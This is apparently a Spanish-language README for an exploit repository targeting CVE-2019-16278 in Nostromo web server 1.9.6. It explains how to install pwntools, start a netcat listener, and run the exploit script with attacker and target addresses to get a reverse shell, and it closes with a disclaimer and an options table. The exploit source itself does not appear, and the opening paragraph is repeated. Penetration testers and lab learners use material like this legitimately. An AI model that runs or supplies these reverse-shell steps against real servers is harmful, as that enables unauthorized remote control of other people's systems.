
Este repositorio contiene un exploit para CVE-2019-16278 en Nostromo Web Server 1.9.6, que permite la ejecución remota de código mediante una vulnerabilidad de directory traversal. El script utiliza pwntools para establecer una reverse shell. Solo para uso educativo y pruebas autorizadas.
Este repositorio contiene un exploit para CVE-2019-16278 en Nostromo Web Server 1.9.6, que permite la ejecución remota de código mediante una vulnerabilidad de directory traversal. El script usa pwntools para establecer una reverse shell. Solo para fines educativos y pruebas autorizadas.
Para instalar pwntools, usa:
pip3 install pwntools
Inicia un listener: En la máquina atacante, inicia un listener en el puerto especificado para recibir la reverse shell:
nc -lvnp <attacker-port>
Ejecuta el script: Usa el siguiente comando para ejecutar el script de explotación. Reemplaza los valores según sea necesario.
python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
En este ejemplo:
--attacker-ip 10.10.14.15 es la dirección IP de la máquina atacante.--attacker-port 4444 es el puerto en el que la máquina atacante está escuchando la reverse shell.-t 10.10.10.165 especifica la IP del objetivo (por defecto 10.10.10.165).-p 80 especifica el puerto del objetivo (por defecto 80).nc).Si tienes éxito, deberías recibir una reverse shell en tu listener con acceso al sistema objetivo.
Este script está destinado únicamente a fines educativos y pruebas autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. El autor y los colaboradores no son responsables de ningún uso indebido o daño causado por esta herramienta. Úsalo de manera responsable y solo en sistemas en los que tengas permiso para realizar pruebas.
| Opción | Descripción | Predeterminado |
|---|
-t, --target | Dirección IP del host remoto | 10.10.10.165 |
-p, --port | Puerto del host remoto al que atacar | 80 |
--attacker-ip | Dirección IP de la máquina atacante para la reverse shell | Ninguno (obligatorio) |
--attacker-port | Puerto de la máquina atacante para la reverse shell | Ninguno (obligatorio) |